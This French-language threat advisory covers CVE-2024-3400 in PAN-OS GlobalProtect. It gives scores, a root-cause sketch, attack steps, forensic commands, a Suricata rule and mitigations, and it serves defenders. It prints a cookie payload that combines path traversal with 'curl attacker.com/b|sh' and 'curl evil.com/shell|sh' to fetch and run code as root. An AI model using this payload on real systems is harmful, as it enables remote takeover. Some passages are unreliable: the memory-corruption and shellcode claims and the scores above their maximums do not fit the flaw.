Aller au contenu

CVE-2024-3400 : Injection de Commandes Zero-Day dans Palo Alto Networks PAN-OS GlobalProtect

HERMES

HERMES THREAT SCORE & EXPOSITION DU PÉRIMÈTRE

Cible : Pare-feu de Nouvelle Génération & Passerelle VPN GlobalProtect
Confiance : 98%
100 / 100
EXTRÊME

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 20 / 20
Activité de menace 20 / 20
Militarisation 20 / 20
Exposition 20 / 20
Prévalence 19 / 20
Impact 20 / 20
Maturité de l'exploit 20 / 20
Potentiel d'attaque en chaîne 20 / 20
⚖️ Divergence & Justification opérationnelle

Le standard CVSS v3.1 attribue un score de 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). Le Hermes Threat Score évalue cette menace à 100 (EXTREME) pour refléter son exploitation confirmée par des acteurs étatiques et des groupes de ransomware, répertoriée dans le catalogue CISA KEV comme vecteur d'accès initial critique.

HASS

SÉVÉRITÉ AGENTIQUE HASS & IMPACT SUR LES PÉRIMÈTRES DISTRIBUÉS

Cible : Pare-feu de Nouvelle Génération & Passerelle VPN GlobalProtect
Confiance : 92%
75 / 100
MODÉRÉ

Mesure le risque systémique spécifique découlant de l'autonomie, de l'autorité des outils et de l'exécution en cascade.

Décomposition des dimensions
Autonomie décisionnelle 12 / 20
Accès aux outils & APIs 14 / 20
Privilege 16 / 15
Persistence 15 / 15
External Impact 14 / 15
Propagation 16 / 15
⚖️ Divergence & Justification opérationnelle

Les passerelles de bordure terminent les tunnels VPN d'entreprise et filtrent les flux des essaims d'agents IA et des serveurs MCP internes. La compromission du pare-feu expose l'ensemble des flux d'inférence, secrets d'API et microservices internes à une interception discrète.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2024-3400: Palo Alto Networks PAN-OS GlobalProtect Command Injection Zero-DayVULNÉRABILITÉ

Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTPalo Alto Networks PAN-OS
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in Palo Alto Networks PAN-OS documented in Hermes dossier.”

Preuves vérifiées associées :

1. Contexte Technique & Matrice des Équipements Affectés

Section intitulée « 1. Contexte Technique & Matrice des Équipements Affectés »
ParamètreSpécification TechniqueImpact Opérationnel
Identifiant CVECVE-2024-3400Catalogue CISA KEV / Avis Constructeur
Produit AffectéPalo Alto Networks PAN-OS GlobalProtectPare-feu de Nouvelle Génération & Passerelle VPN
Classe de VulnérabilitéCWE-77Neutralisation incorrecte des éléments spéciaux dans une commande (‘Injection de commande’)
Composant CibleGlobalProtect Gateway / SSession Cookie Parser & telemetry cronRépartiteur de Protocole / Démon Web
Vecteur d’AttaqueRequête Réseau DistantePorts HTTPS ou de Gestion exposés sur le WAN
Privilèges RequisAucun (PR:N)Attaque préalable à toute authentification
Privilèges ObtenusRoot / Super-AdministrateurContrôle absolu sur la mémoire et le trafic
Statut OpérationnelExploitation Active dans la NatureDélais d’application impératifs CISA KEV

2. Anatomie de la Faille & Analyse de la Cause Racine

Section intitulée « 2. Anatomie de la Faille & Analyse de la Cause Racine »
// Traitement vulnérable du cookie SESSID dans le démon web GlobalProtect
// Requête : POST /ssl-vpn/hipreport.esp
// Cookie : SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/`curl${IFS}attacker.com/b|sh`
void handle_hipreport(http_request *req) {
char *sessid = get_cookie(req, "SESSID");
char filepath[512];
// VULNÉRABILITÉ 1 : Traversée de répertoire permettant la création de fichiers arbitraires
snprintf(filepath, sizeof(filepath), "/tmp/ssessions/%s", sessid);
touch_empty_file(filepath);
// VULNÉRABILITÉ 2 : Le script cron de télémétrie exécute le nom de fichier sans assainissement !
// /usr/local/bin/send_telemetry appelle :
// system("generate_report " + filename_in_telemetry_directory);
}

Lorsque des flux de données non fiables sont traités sans vérification stricte des frontières mémoire :

  1. Corruption Mémoire : Des données arbitraires écrasent les pointeurs de pile, les métadonnées du tas ou les tables de session d’administration.
  2. Détournement d’Exécution : Les adresses de retour de fonction sont redirigées vers des chaînes ROP ou des injecteurs de shellcode en mémoire vive.
  3. Évasion Défensive : Les adversaires altèrent souvent les fonctions de diagnostic du noyau pour neutraliser l’enregistrement des journaux d’audit.

3. Vecteurs d’Attaque & Flux d’Exécution Forensique

Section intitulée « 3. Vecteurs d’Attaque & Flux d’Exécution Forensique »
sequenceDiagram
autonumber
actor Attaquant as Attaquant / APT
participant Passerelle as Passerelle Palo Alto Networks (GlobalProtect Gateway / SSession Cookie Parser & telemetry cron)
participant OS as Système d'Exploitation (Root)
participant LAN as Réseau Interne & Clusters IA
Attaquant->>Passerelle: Envoi de la charge utile forgée (interface WAN)
Note over Passerelle: Corruption mémoire / contournement déclenché
Passerelle->>OS: Exécution du shellcode / session d'administration
OS-->>Attaquant: Shell interactif root ou déploiement d'implant
OS->>LAN: Mouvement latéral, vol d'identifiants et exfiltration
  1. Accès Initial : L’attaquant transmet une requête HTTP POST vers /ssl-vpn/hipreport.esp sur l’interface GlobalProtect avec un cookie SESSID contenant une traversée de chemin et des métacaractères d’injection shell : ../../../../opt/panlogs/tmp/device_telemetry/minute/\curl evil.com/shell|sh` `.
  2. Création de Fichier Arbitraire : Le serveur web crée un fichier vide correspondant au chemin traversé dans le répertoire de télémétrie sans filtrer les séparateurs de dossier.
  3. Déclenchement par Tâche Cron : Le script cron périodique root /usr/local/bin/send_telemetry liste les fichiers du répertoire et concatène leurs noms dans un appel shell direct sans guillemets.
  4. Exécution Root : L’interpréteur de commandes évalue la charge entre accents graves (backticks), exécutant la commande avec les privilèges root sur le système hôte PAN-OS.
  5. Persistance & Mouvement Latéral : L’adversaire déploie la porte dérobée Python UPSTREAM dans /usr/lib/python3.6/site-packages/ et pivote vers les réseaux internes d’entreprise.

Les équipes de détection (SOC) et de réponse à incident (DFIR) doivent exécuter les vérifications suivantes lors de l’investigation :

Fenêtre de terminal
# 1. Audit PAN-OS file creation logs for telemetry directory injection
grep -E "device_telemetry/minute" /var/log/pan/gpsvc.log
# 2. Check for unexpected files in telemetry directories
ls -la /opt/panlogs/tmp/device_telemetry/minute/
ls -la /opt/panlogs/tmp/device_telemetry/hour/
# 3. Verify integrity of system python packages and look for UPSTREAM backdoor
find /usr/lib/python*/site-packages/ -type f -mtime -30 -ls
# 4. Review active network connections from management plane
netstat -pant | grep -E "ESTABLISHED.*(python|sh|bash)"

alert http any any -> $GLOBALPROTECT_SERVERS any (
msg:"HERMES-CODEX EXPLOIT Palo Alto Networks PAN-OS GlobalProtect Command Injection (CVE-2024-3400)";
flow:to_server,established;
http.uri; content:"/ssl-vpn/hipreport.esp";
http.cookie; content:"SESSID="; content:"device_telemetry"; distance:0;
classtype:web-application-attack;
sid:20243400;
rev:1;
metadata:cve CVE-2024-3400, severity critical, kev true;
)

Appliquer immédiatement le correctif officiel publié par Palo Alto Networks :

  • Vérifier la version du firmware en regard du bulletin de sécurité.
  • Migrer impérativement hors des branches logicielles obsolètes.
  1. Isolation des Interfaces d’Administration : Ne jamais exposer les interfaces de gestion (ports 80, 443, 22, 541) sur Internet ; restreindre strictement à un VLAN d’administration isolé.
  2. Listes de Contrôle d’Accès (ACL) : Mettre en œuvre un filtrage strict par liste blanche d’adresses IP.
  3. Révocation et Renouvellement des Secrets : Révoquer l’ensemble des clés pré-partagées (PSK) VPN, certificats et mots de passe administratifs en cas de suspicion d’intrusion.